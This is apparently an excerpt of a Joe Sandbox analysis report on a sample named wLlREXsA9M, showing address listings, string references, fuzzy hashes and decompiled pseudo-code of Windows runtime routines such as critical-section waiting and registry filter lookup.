0x328914b6
0x328914bb
0x328914bb
0x32891646
0x3289164d
0x32891652
0x3289165b
0x3289165f
0x00000000
0x32891665
0x32891665
0x3289166c
0x3289166d
0x3289166f
0x00000000
0x3289166f
0x3289165f
0x32891433
0x32891433
0x32891436
0x32891436
0x32891439
0x32891449
0x32891449
0x32891449
0x3289143b
0x3289143d
0x3289143f
0x328916d7
0x00000000
0x32891445
0x32891445
0x00000000
0x32891445
0x3289143f
0x32891455
0x00000000
0x32891455
0x32891431
0x32891400
0x32891403
0x32891405
0x32891407
0x32891408
0x3289140d
0x3289140e
0x00000000

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 32891648
HEAP[%wZ]: , xrefs: 32891632
HEAP: , xrefs: 328914B6

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 6d1e4e07d12fdba4ec0b0c7e125ca21215dcec56f1ce9518dc30d8b30f025bd8
Instruction ID: 203d552f53681b080816862459ebc7ed29da02803cb156e837eff040180f7957
Opcode Fuzzy Hash: 6d1e4e07d12fdba4ec0b0c7e125ca21215dcec56f1ce9518dc30d8b30f025bd8
Instruction Fuzzy Hash: 7DE1D078A083459FE719CF28C8907BABBE1AF59744F14C85DE89ACB246EB34D941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 328BF4D0 Relevance: 4.1, Strings: 3, Instructions: 382
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E328BF4D0(signed int __ecx, signed char __edx, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed char _v72;
				signed int _v76;
				char _v80;
				void* _v84;
				char _v88;
				signed int _v92;
				intOrPtr _v96;
				void* _v100;
				signed int _v104;
				char _v108;
				signed char _v112;
				intOrPtr _v116;
				void* _v120;
				signed int _v124;
				signed int _v128;
				char _v129;
				char _v130;
				intOrPtr _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t129;
				signed int _t132;
				signed int _t134;
				signed char* _t138;
				signed char* _t139;
				signed char* _t140;
				void* _t142;
				signed int _t144;
				signed int _t145;
				void* _t152;
				void* _t153;
				signed int _t156;
				signed int _t159;
				signed int _t169;
				signed int _t172;
				signed int _t173;
				signed int _t176;
				signed int _t179;
				signed int* _t180;
				signed int _t183;
				signed int _t191;
				signed char* _t192;
				signed int _t198;
				intOrPtr _t201;
				intOrPtr _t202;
				intOrPtr _t203;
				void* _t206;
				unsigned int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				intOrPtr _t218;
				intOrPtr _t220;
				signed int _t223;
				signed int _t226;
				intOrPtr _t229;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				intOrPtr _t238;
				signed char _t241;
				void* _t244;
				signed int _t246;
				intOrPtr _t247;
				void* _t251;
				signed int _t252;
				signed int _t254;
				void* _t255;
				void* _t256;

				_t234 = __edx;
				_t209 = __ecx;
				_t254 = (_t252 & 0xfffffff8) - 0x84;
				_v8 =  *0x3298b370 ^ _t254;
				_t129 =  *[fs:0x18];
				_t241 = __ecx;
				_v112 = __edx;
				_v72 = __ecx;
				_v129 = 0;
				_v64 = _t129;
				_v108 = 0;
				if(__ecx == 0x32983390) {
					_v129 = 1;
					 *((intOrPtr*)(_t129 + 0xf84)) = 1;
				}
				if( *0x32985da8 != 0) {
					_push(0xc000004b);
					_push(0xffffffff);
					L328D2C70();
				}
				if( *0x32985a84 == 0) {
					_v120 = 0x32985a88;
				} else {
					_v120 = 0;
				}
				_t246 = _t241 + 0x10;
				if( *(_t241 + 0x10) == 0) {
					_t210 = _t209 | 0xffffffff;
					__eflags =  *0x32984ae2;
					_v124 = _t210;
					if( *0x32984ae2 != 0) {
						_push(0);
						_push(1);
						_push(0);
						_push(0x100003);
						_push( &_v124);
						_t132 = E328D2E30();
						__eflags = _t132;
						if(_t132 >= 0) {
							_t211 = _v124;
						} else {
							_t211 = _t210 | 0xffffffff;
							_v124 = _t210 | 0xffffffff;
						}
					}
					asm("lock cmpxchg [esi], ecx");
					__eflags = 0;
					if(0 != 0) {
						_t198 = _v124;
						__eflags = _t198 - 0xffffffff;
						if(_t198 != 0xffffffff) {
							_push(_t198);
							E328D2A80();
						}
					}
				}
				_t134 =  *_t241;
				if(_t134 == 0xffffffff) {
					_t134 = _t134 | 0xffffffff;
					__eflags =  *(_t241 + 0x14) & 0x01000000;
					if(( *(_t241 + 0x14) & 0x01000000) == 0) {
						_t211 = _t241;
						L328BFCE0(_t241, _t234);
						_t134 =  *_t241;
					}
				}
				_v104 = 0;
				if(_t134 != 0xffffffff) {
					 *((intOrPtr*)(_t134 + 0x14)) =  *((intOrPtr*)(_t134 + 0x14)) + 1;
				}
				_t201 =  *_t246;
				_v68 = _t201;
				L9:
				while(1) {
					L9:
					if(L328A3C40() != 0) {
						_t138 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t138 = 0x7ffe0382;
					}
					if( *_t138 != 0) {
						_t139 =  *[fs:0x30];
						__eflags = _t139[0x240] & 0x00000002;
						if((_t139[0x240] & 0x00000002) != 0) {
							_v16 = _t241;
							_v54 = 0x1722;
							_v24 =  *(_t241 + 0x14) & 0x00ffffff;
							_v28 =  *(_t241 + 4);
							_v20 =  *((intOrPtr*)(_t241 + 0xc));
							_t191 = ( *[fs:0x30])[0x50];
							__eflags = _t191;
							if(_t191 == 0) {
								L61:
								_t192 = 0x7ffe0382;
							} else {
								__eflags =  *_t191;
								if( *_t191 == 0) {
									goto L61;
								} else {
									_t192 = ( *[fs:0x30])[0x50] + 0x228;
								}
							}
							_t211 =  &_v60;
							_push( &_v60);
							_push("true");
							_push(0x20402);
							_push( *_t192 & 0x000000ff);
							E328D2F90();
						}
						goto L12;
						L24:
						if(_t140 < 0) {
							E328E8AA0(_t211, _t234, _t140);
							asm("int3");
							__eflags = _t246 != 4;
							if(_t246 != 4) {
								L47:
								E328BF946(_v132,  &_v124);
								_t152 = 0;
							} else {
								_t124 = _t241 + 4; // 0x74db85f0
								_t238 =  *_t124;
								_t153 =  *_t241;
								asm("lock cmpxchg8b [esi]");
								__eflags = _t153 -  *_t241;
								if(_t153 !=  *_t241) {
									goto L47;
								} else {
									_t126 = _t241 + 4; // 0x74db85f0
									__eflags = _t238 -  *_t126;
									if(__eflags != 0) {
										goto L47;
									} else {
										_t152 = L328BF8A5(_v132,  &_v124, _a8, _a12);
									}
								}
							}
							return _t152;
						} else {
							if(_v129 != 0) {
								 *((intOrPtr*)(_v64 + 0xf84)) = 0;
								_t156 = ( *[fs:0x30])[0x50];
								__eflags = _t156;
								if(_t156 == 0) {
									L81:
									_t140 = 0x7ffe0384;
								} else {
									__eflags =  *_t156;
									if( *_t156 == 0) {
										goto L81;
									} else {
										_t140 = ( *[fs:0x30])[0x50] + 0x22a;
									}
								}
								__eflags =  *_t140;
								if( *_t140 != 0) {
									_t140 =  *[fs:0x30];
									__eflags = _t140[0x240] & 0x00000004;
									if((_t140[0x240] & 0x00000004) != 0) {
										_t159 = ( *[fs:0x30])[0x50];
										__eflags = _t159;
										if(_t159 == 0) {
											L87:
											_t140 = 0x7ffe0385;
										} else {
											__eflags =  *_t159;
											if( *_t159 == 0) {
												goto L87;
											} else {
												_t140 = ( *[fs:0x30])[0x50] + 0x22b;
											}
										}
										__eflags =  *_t140 & 0x00000020;
										if(( *_t140 & 0x00000020) != 0) {
											_t140 = E32910227(0x1483, _t234, 0xffffffff, 0xffffffff, 0, 0);
										}
									}
								}
							}
							_pop(_t244);
							_pop(_t251);
							_pop(_t206);
							return E328D4B50(_t140, _t206, _v8 ^ _t254, _t234, _t244, _t251);
						}
					}
					L12:
					if(_t201 != 0xffffffff) {
						_push(_v120);
						_push(0);
						_push(_t201);
						_t140 = E328D29D0();
					} else {
						_t207 = _t241 + 4;
						_v76 =  &_v100 & 0xfffffffc;
						do {
							_t218 =  *[fs:0x18];
							_v100 = _t207;
							_v80 = 1;
							_v88 = 0;
							_v92 = 0;
							_v84 = 0;
							_v96 =  *((intOrPtr*)(_t218 + 0x24));
							_t208 = _v76;
							_t220 =  *((intOrPtr*)(_t218 + 0x30)) + 0x25c;
							_t169 = _t207 >> 0x00000005 & 0x0000007f;
							_v116 = _t220;
							_t235 =  *(_t220 + _t169 * 4);
							_v128 = _t220 + _t169 * 4;
							while(1) {
								_t172 = _t235 & 0xfffffffc;
								_t223 = _t235 & 0x00000003 | _t208;
								_v92 = _t172;
								if(_t172 != 0) {
									_v84 = 0;
									_t223 = _t223 | 0x00000002;
								} else {
									_v84 =  &_v100;
								}
								_t246 = _t223;
								_t173 = _t235;
								asm("lock cmpxchg [edi], esi");
								if(_t173 == _t235) {
									break;
								}
								_t235 = _t173;
							}
							_t241 = _v72;
							_t207 = _t241 + 4;
							if(((_t223 ^ _t235) & 0x00000002) != 0) {
								_t246 = _v128;
								_t236 =  *_t246;
								while(1) {
									_t226 = _t236 & 0xfffffffc;
									__eflags =  *(_t226 + 0x10);
									_v128 = _t226 + 0x10;
									if( *(_t226 + 0x10) == 0) {
										goto L31;
									}
									do {
										L31:
										_t183 = _t226;
										_t226 =  *(_t226 + 8);
										 *(_t226 + 0xc) = _t183;
										__eflags =  *(_t226 + 0x10);
									} while ( *(_t226 + 0x10) == 0);
									L32:
									 *_v128 =  *(_t226 + 0x10);
									__eflags = _t236 & 0x00000001;
									if((_t236 & 0x00000001) != 0) {
										_v130 = 1;
									} else {
										_v130 = 0;
										__eflags = _t236 & 0xfffffffc;
									}
									_t176 = _t236;
									asm("lock cmpxchg [esi], ecx");
									__eflags = _t176 - _t236;
									if(_t176 != _t236) {
										_t236 = _t176;
										_t226 = _t236 & 0xfffffffc;
										__eflags =  *(_t226 + 0x10);
										_v128 = _t226 + 0x10;
										if( *(_t226 + 0x10) == 0) {
											goto L31;
										}
										goto L32;
									}
									__eflags = _v130;
									if(_v130 != 0) {
										_t179 = _t176 & 0xfffffffc;
										__eflags = _t179;
										_v128 = _t179;
										if(_t179 != 0) {
											do {
												_t246 =  *(_t179 + 8);
												_t180 = _t179 + 0x14;
												 *_t180 = 2;
												__eflags =  *_t180;
												if( *_t180 == 0) {
													_push( *((intOrPtr*)(_v128 + 4)));
													E328D30B0();
												}
												_t179 = _t246;
												_v128 = _t179;
												__eflags = _t246;
											} while (_t246 != 0);
										}
									}
									goto L19;
								}
							}
							L19:
							_t234 =  &_v100;
							_t229 = _v116;
							if( *_t207 != _v112) {
								E328BF946(_t229, _t234);
								_t140 = 0;
							} else {
								_t140 = L328BF8A5(_t229, _t234, _v120, 0);
							}
							if(_t140 == 0x102) {
								L70:
								_t202 = _v108;
								_t247 =  *[fs:0x18];
								_push(_t202);
								_t142 = E328D6310( *_v120,  *((intOrPtr*)(_v120 + 4)), 0xff676980, 0xffffffff);
								_push(_t234);
								L3291EF10(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t142);
								_t144 =  *_t241;
								_t255 = _t254 + 0x18;
								__eflags = _t144 - 0xffffffff;
								if(_t144 == 0xffffffff) {
									_t145 = 0;
									__eflags = 0;
								} else {
									_t145 =  *((intOrPtr*)(_t144 + 0x14));
								}
								_push(_t145);
								_push(_t241);
								_push( *((intOrPtr*)(_t241 + 0xc)));
								_push( *((intOrPtr*)(_t247 + 0x24)));
								L3291EF10(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t247 + 0x20)));
								_t256 = _t255 + 0x20;
								_t203 = _t202 + 1;
								_t211 = _t241;
								_v108 = _t203;
								_t246 = E3292A9AE(_t241);
								__eflags = _t203 - 2;
								if(_t203 > 2) {
									__eflags = _t241 - 0x32983390;
									if(_t241 != 0x32983390) {
										__eflags = _t246 - _v104;
										if(_t246 == _v104) {
											L3292AB5E(_t211);
										}
									}
								}
								_push("RTL: Re-Waiting\n");
								_push(0);
								_push(0x65);
								_v104 = _t246;
								L3291EF10();
								_t201 = _v68;
								_t254 = _t256 + 0xc;
								goto L9;
							} else {
								goto L22;
							}
							goto L23;
							L22:
							_t211 =  *_t207;
							_v112 = _t211;
						} while ((_t211 & 0x00000002) != 0);
					}
					L23:
					if(_t140 == 0x102) {
						goto L70;
					}
					goto L24;
				}
			}

0x328bf4d0
0x328bf4d0
0x328bf4d8
0x328bf4e5
0x328bf4ec
0x328bf4f5
0x328bf4f7
0x328bf4fb
0x328bf4ff
0x328bf504
0x328bf508
0x328bf516
0x328fff46
0x328fff4b
0x328fff4b
0x328bf523
0x328fff5a
0x328fff5f
0x328fff61
0x328fff61
0x328bf530
0x328fff6b
0x328bf536
0x328bf536
0x328bf536
0x328bf542
0x328bf545
0x328bf722
0x328bf725
0x328bf72c
0x328bf730
0x328fff78
0x328fff7a
0x328fff7c
0x328fff7e
0x328fff87
0x328fff88
0x328fff8d
0x328fff8f
0x328fff9d
0x328fff91
0x328fff91
0x328fff94
0x328fff94
0x328fff8f
0x328bf738
0x328bf73c
0x328bf73e
0x328fffa6
0x328fffaa
0x328fffad
0x328fffb3
0x328fffb4
0x328fffb4
0x328fffad
0x328bf73e
0x328bf54b
0x328bf550
0x328bf749
0x328bf74c
0x328bf753
0x328bf759
0x328bf75b
0x328bf760
0x328bf760
0x328bf753
0x328bf556
0x328bf561
0x328bf563
0x328bf563
0x328bf566
0x328bf568
0x00000000
0x328bf570
0x328bf570
0x328bf577
0x328fffc7
0x328bf57d
0x328bf57d
0x328bf57d
0x328bf585
0x328fffd1
0x328fffd7
0x328fffde
0x328fffe9
0x328ffff0
0x328ffffd
0x32900004
0x3290000b
0x32900018
0x3290001b
0x3290001d
0x32900034
0x32900034
0x3290001f
0x3290001f
0x32900022
0x00000000
0x32900024
0x3290002d
0x3290002d
0x32900022
0x3290003c
0x32900040
0x32900041
0x32900043
0x32900048
0x32900049
0x32900049
0x00000000
0x328bf682
0x328bf684
0x329001e2
0x329001e7
0x329001e8
0x329001eb
0x328bf825
0x328bf82d
0x328bf832
0x329001f1
0x329001f1
0x329001f4
0x329001f6
0x329001ff
0x32900203
0x32900205
0x00000000
0x3290020b
0x3290020b
0x3290020b
0x328bf807
0x00000000
0x328bf809
0x328bf817
0x328bf817
0x328bf807
0x32900205
0x328bf822
0x328bf68a
0x328bf68f
0x3290014a
0x3290015a
0x3290015d
0x3290015f
0x32900176
0x32900176
0x32900161
0x32900161
0x32900164
0x00000000
0x32900166
0x3290016f
0x3290016f
0x32900164
0x3290017b
0x3290017e
0x32900184
0x3290018a
0x32900191
0x3290019d
0x329001a0
0x329001a2
0x329001b9
0x329001b9
0x329001a4
0x329001a4
0x329001a7
0x00000000
0x329001a9
0x329001b2
0x329001b2
0x329001a7
0x329001be
0x329001c1
0x329001d7
0x329001d7
0x329001c1
0x32900191
0x3290017e
0x328bf69c
0x328bf69d
0x328bf69e
0x328bf6a9
0x328bf6a9
0x328bf684
0x328bf58b
0x328bf58e
0x32900093
0x32900097
0x32900099
0x3290009a
0x328bf594
0x328bf59b
0x328bf59e
0x328bf5a2
0x328bf5a2
0x328bf5a9
0x328bf5ad
0x328bf5b5
0x328bf5bd
0x328bf5c5
0x328bf5d0
0x328bf5d9
0x328bf5dd
0x328bf5e6
0x328bf5e9
0x328bf5ed
0x328bf5f3
0x328bf600
0x328bf607
0x328bf60a
0x328bf60c
0x328bf612
0x328bf6b3
0x328bf6bb
0x328bf618
0x328bf61c
0x328bf61c
0x328bf620
0x328bf622
0x328bf624
0x328bf62a
0x00000000
0x00000000
0x32900053
0x32900053
0x328bf630
0x328bf636
0x328bf63c
0x328bf6c3
0x328bf6c7
0x328bf6d0
0x328bf6d2
0x328bf6d5
0x328bf6dc
0x328bf6e0
0x00000000
0x00000000
0x328bf6e2
0x328bf6e2
0x328bf6e2
0x328bf6e4
0x328bf6e7
0x328bf6ea
0x328bf6ea
0x328bf6f0
0x328bf6f7
0x328bf6f9
0x328bf6fc
0x328bf767
0x328bf6fe
0x328bf700
0x328bf705
0x328bf705
0x328bf708
0x328bf70a
0x328bf70e
0x328bf710
0x328bf770
0x328bf6d2
0x328bf6d5
0x328bf6dc
0x328bf6e0
0x00000000
0x00000000
0x00000000
0x328bf6e0
0x328bf712
0x328bf717
0x3290005a
0x3290005a
0x3290005d
0x32900061
0x32900067
0x32900067
0x3290006f
0x32900072
0x32900074
0x32900076
0x3290007c
0x3290007f
0x3290007f
0x32900084
0x32900086
0x3290008a
0x3290008a
0x3290008e
0x32900061
0x00000000
0x328bf717
0x328bf6d0
0x328bf642
0x328bf644
0x328bf648
0x328bf650
0x328bf6aa
0x328bf6af
0x328bf652
0x328bf658
0x328bf658
0x328bf662
0x329000a4
0x329000a4
0x329000ac
0x329000b3
0x329000c0
0x329000c5
0x329000d0
0x329000d5
0x329000d7
0x329000da
0x329000dd
0x329000e4
0x329000e4
0x329000df
0x329000df
0x329000df
0x329000e6
0x329000e7
0x329000e8
0x329000eb
0x329000fa
0x329000ff
0x32900102
0x32900103
0x32900105
0x3290010e
0x32900110
0x32900113
0x32900115
0x3290011b
0x3290011d
0x32900121
0x32900123
0x32900123
0x32900121
0x3290011b
0x32900128
0x3290012d
0x3290012f
0x32900131
0x32900135
0x3290013a
0x3290013e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x328bf668
0x328bf668
0x328bf66a
0x328bf66e
0x328bf5a2
0x328bf677
0x328bf67c
0x00000000
0x00000000
0x00000000
0x328bf67c

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 329000F1
RTL: Re-Waiting, xrefs: 32900128
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 329000C7

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 4d1b8c4bd18c3eee988d242b71a97140c0a7a400004d018aa8cc78b3f9f3df27
Instruction ID: 62ed2e14536d99b41e3910d8ef2793dc1e6af6eddf385e8bdf4ae920c26f214e
Opcode Fuzzy Hash: 4d1b8c4bd18c3eee988d242b71a97140c0a7a400004d018aa8cc78b3f9f3df27
Instruction Fuzzy Hash: 25E1D0786087459FEB25CF68C880B0AB7E0BF95358F104A5DF9A98B3E1DB74D944CB42

Uniqueness

Uniqueness Score: -1.00%

Function 3288A147 Relevance: 4.0, Strings: 3, Instructions: 238
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E3288A147(signed int* __ecx, char* __edx, signed int _a4) {
				signed int _v12;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				char _v560;
				signed int _v564;
				intOrPtr _v568;
				char _v572;
				intOrPtr _v576;
				short _v578;
				char _v580;
				signed int _v584;
				intOrPtr _v586;
				char _v588;
				char* _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				char* _v604;
				signed int* _v608;
				intOrPtr _v612;
				short _v614;
				char _v616;
				signed int _v620;
				signed int _v624;
				intOrPtr _v628;
				char* _v632;
				signed int _v636;
				char _v640;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t94;
				char _t96;
				char* _t101;
				intOrPtr _t120;
				void* _t121;
				intOrPtr _t125;
				short _t129;
				signed int* _t140;
				intOrPtr _t141;
				intOrPtr _t146;
				intOrPtr _t148;
				intOrPtr _t151;
				signed int _t153;
				signed int _t154;
				void* _t155;
				signed int _t157;

				_t152 = __edx;
				_v12 =  *0x3298b370 ^ _t157;
				_v564 = _v564 & 0x00000000;
				_t154 = _a4;
				_t140 = __ecx;
				_v604 = __edx;
				_v608 = __ecx;
				_t153 = 0;
				_v568 = 0x220;
				_v592 =  &_v560;
				if(L328B1D10( &_v580, L"UseFilter") < 0) {
					L4:
					return E328D4B50(_t90, _t140, _v12 ^ _t157, _t152, _t153, _t154);
				}
				_push( &_v572);
				_push(0x220);
				_push( &_v560);
				_t94 = 2;
				_push(_t94);
				_push( &_v580);
				_push( *_t140);
				_t90 = E328D2B00();
				if(_t90 >= 0) {
					if(_v556 != 4 || _v552 != 4 || _v548 == 0) {
						L3:
						_t90 = 0;
					} else {
						_t96 =  *_t154;
						_t154 =  *(_t154 + 4);
						_v588 = _t96;
						_v584 = _t154;
						if(L328B1D10( &_v580, L"\\??\\") < 0) {
							goto L4;
						}
						if(E328C40F0( &_v560,  &_v580,  &_v588, 1) != 0) {
							_v588 = _v588 + 0xfff8;
							_v586 = _v586 + 0xfff8;
							_v584 = _t154 + 8;
						}
						_t101 =  &_v560;
						_t146 = 0;
						_v596 = _t101;
						_v600 = 0;
						do {
							_t152 =  &_v572;
							_push( &_v572);
							_push(_v568);
							_push(_t101);
							_push(0);
							_push(_t146);
							_push( *_t140);
							_t154 = L328D2CD0();
							if(_t154 < 0) {
								goto L37;
							}
							_t148 = _v596;
							_v580 =  *((intOrPtr*)(_t148 + 0xc));
							_v624 = _v624 & 0x00000000;
							_v620 = _v620 & 0x00000000;
							_v578 =  *((intOrPtr*)(_t148 + 0xc));
							_v576 = _t148 + 0x10;
							_v636 =  *_t140;
							_v632 =  &_v580;
							_push( &_v640);
							_push(_v604);
							_v640 = 0x18;
							_push( &_v564);
							_v628 = 0x240;
							_t154 = E328D2AB0();
							if(_t154 < 0) {
								goto L37;
							}
							_t154 = L328B1D10( &_v580, L"FilterFullPath");
							if(_t154 < 0) {
								L36:
								_push(_v564);
								E328D2A80();
								goto L37;
							}
							_t141 = _v592;
							_t120 = _v568;
							do {
								_push( &_v572);
								_push(_t120);
								_push(_t141);
								_t121 = 2;
								_push(_t121);
								_push( &_v580);
								_push(_v564);
								_t155 = E328D2B00();
								if(_t155 == 0x80000005 || _t155 == 0xc0000023) {
									if(_t153 != 0) {
										E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t153);
									}
									_t150 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
									if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
										_t125 =  *0x32985d78; // 0x0
										_t153 = L328A5D90(_t150, _t150, _t125 + 0x180000, _v572);
										if(_t153 == 0) {
											goto L25;
										}
										_t120 = _v572;
										_t141 = _t153;
										_v596 = _t153;
										_v568 = _t120;
										goto L27;
									} else {
										_t153 = 0;
										L25:
										_t154 = 0xc0000017;
										goto L26;
									}
								} else {
									L26:
									_t120 = _v568;
								}
								L27:
							} while (_t154 == 0x80000005 || _t154 == 0xc0000023);
							_v592 = _t141;
							_t140 = _v608;
							if(_t154 >= 0) {
								_t151 = _v592;
								if( *((intOrPtr*)(_t151 + 4)) == 1 &&  *((intOrPtr*)(_t151 + 8)) <= 0xfffe) {
									_t152 = 2;
									_t129 =  *((intOrPtr*)(_t151 + 8)) - _t152;
									_v616 = _t129;
									_v614 = _t129;
									_v612 = _t151 + 0xc;
									if(E328B04C0( &_v588,  &_v616, 1) == 0) {
										break;
									}
								}
								goto L36;
							}
							_push(_v564);
							E328D2A80();
							_t65 = _t154 + 0x3fffffcc; // 0x3fffffcc
							asm("sbb eax, eax");
							_t154 = _t154 &  ~_t65;
							L37:
							_t101 = _v596;
							_t146 = _v600 + 1;
							_v600 = _t146;
						} while (_t154 >= 0);
						if(_t153 != 0) {
							E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t153);
						}
						if(_t154 >= 0) {
							_push( *_t140);
							E328D2A80();
							 *_t140 = _v564;
						}
						_t86 = _t154 + 0x7fffffe6; // 0x7fffffe6
						asm("sbb eax, eax");
						_t90 =  ~_t86 & _t154;
					}
					goto L4;
				}
				if(_t90 != 0xc0000034) {
					if(_t90 == 0xc0000023) {
						goto L3;
					}
					if(_t90 != 0x80000005) {
						goto L4;
					}
				}
				goto L3;
			}

0x3288a147
0x3288a159
0x3288a15c
0x3288a16b
0x3288a16e
0x3288a17c
0x3288a183
0x3288a189
0x3288a18b
0x3288a195
0x3288a1a2
0x3288a1de
0x3288a1ec
0x3288a1ec
0x3288a1aa
0x3288a1ab
0x3288a1b6
0x3288a1b9
0x3288a1ba
0x3288a1c1
0x3288a1c2
0x3288a1c4
0x3288a1cb
0x328ebf43
0x3288a1dc
0x3288a1dc
0x328ebf62
0x328ebf62
0x328ebf64
0x328ebf67
0x328ebf79
0x328ebf86
0x00000000
0x00000000
0x328ebfa3
0x328ebfaa
0x328ebfb1
0x328ebfbb
0x328ebfbb
0x328ebfc1
0x328ebfc7
0x328ebfc9
0x328ebfcf
0x328ebfd5
0x328ebfd5
0x328ebfdb
0x328ebfdc
0x328ebfe2
0x328ebfe3
0x328ebfe5
0x328ebfe6
0x328ebfed
0x328ebff1
0x00000000
0x00000000
0x328ebff7
0x328ec001
0x328ec00c
0x328ec013
0x328ec01a
0x328ec024
0x328ec02c
0x328ec038
0x328ec044
0x328ec045
0x328ec051
0x328ec05b
0x328ec05c
0x328ec06b
0x328ec06f
0x00000000
0x00000000
0x328ec086
0x328ec08a
0x328ec1ba
0x328ec1ba
0x328ec1c0
0x00000000
0x328ec1c0
0x328ec090
0x328ec096
0x328ec09c
0x328ec0a2
0x328ec0a3
0x328ec0a4
0x328ec0a7
0x328ec0a8
0x328ec0af
0x328ec0b0
0x328ec0bb
0x328ec0c3
0x328ec0cf
0x328ec0dd
0x328ec0dd
0x328ec0e8
0x328ec0ed
0x328ec138
0x328ec14f
0x328ec153
0x00000000
0x00000000
0x328ec155
0x328ec15b
0x328ec15d
0x328ec163
0x00000000
0x328ec0ef
0x328ec0ef
0x328ec0f1
0x328ec0f1
0x00000000
0x328ec0f1
0x328ec0f6
0x328ec0f6
0x328ec0f6
0x328ec0f6
0x328ec0fc
0x328ec0fc
0x328ec10c
0x328ec112
0x328ec11a
0x328ec16b
0x328ec175
0x328ec186
0x328ec187
0x328ec18a
0x328ec191
0x328ec19b
0x328ec1b8
0x00000000
0x00000000
0x328ec1b8
0x00000000
0x328ec175
0x328ec11c
0x328ec122
0x328ec127
0x328ec12f
0x328ec131
0x328ec1c5
0x328ec1cb
0x328ec1d1
0x328ec1d2
0x328ec1d8
0x328ec1e2
0x328ec1f0
0x328ec1f0
0x328ec1f7
0x328ec1f9
0x328ec1fb
0x328ec206
0x328ec206
0x328ec208
0x328ec210
0x328ec212
0x328ec212
0x00000000
0x328ebf43
0x3288a1d6
0x328ebf26
0x00000000
0x00000000
0x328ebf31
0x00000000
0x00000000
0x328ebf37
0x00000000

Strings

\??\, xrefs: 328EBF73
UseFilter, xrefs: 3288A171
FilterFullPath, xrefs: 328EC075

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: b23acba5f192ec3fbf3a2b454f70d0b991f4230788bad86c71e0953142ef5a8e
Instruction ID: 262a0dbf54c4a0485637581d59e7f234ac7e2e8883e9d2a1938c8528a143906e
Opcode Fuzzy Hash: b23acba5f192ec3fbf3a2b454f70d0b991f4230788bad86c71e0953142ef5a8e
Instruction Fuzzy Hash: 83A16E79D012299BDB21DF28CC88BDAB7B8EF45714F1005EAE90DA7250DB759E84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 3289B360 Relevance: 4.0, Strings: 3, Instructions: 221
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E3289B360(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				short _t85;
				short _t86;
				intOrPtr* _t88;
				signed char* _t89;
				void* _t90;
				signed char* _t91;
				signed int _t93;
				signed int _t95;
				void* _t97;
				intOrPtr* _t99;
				signed int _t105;
				signed short _t109;
				void* _t114;
				signed char _t117;
				signed char _t118;
				signed int _t124;
				short _t127;
				signed int _t131;
				signed char* _t132;
				signed int _t135;
				intOrPtr _t137;
				signed short _t139;
				signed int _t143;
				intOrPtr _t148;
				signed int _t160;
				intOrPtr _t169;
				void* _t171;
				void* _t173;
				signed char _t186;

				_push("true");
				_push(0x3296bf88);
				E328E7BE4(__ebx, __edi, __esi);
				 *((char*)(_t173 - 0x1d)) = 1;
				 *(_t173 - 0x24) = 1;
				_t127 = 0x42;
				 *((short*)(_t173 - 0x44)) = _t127;
				_push("true");
				_pop(_t85);
				 *((short*)(_t173 - 0x42)) = _t85;
				 *(_t173 - 0x40) = L"LdrpResGetResourceDirectory Enter";
				_push("true");
				_pop(_t86);
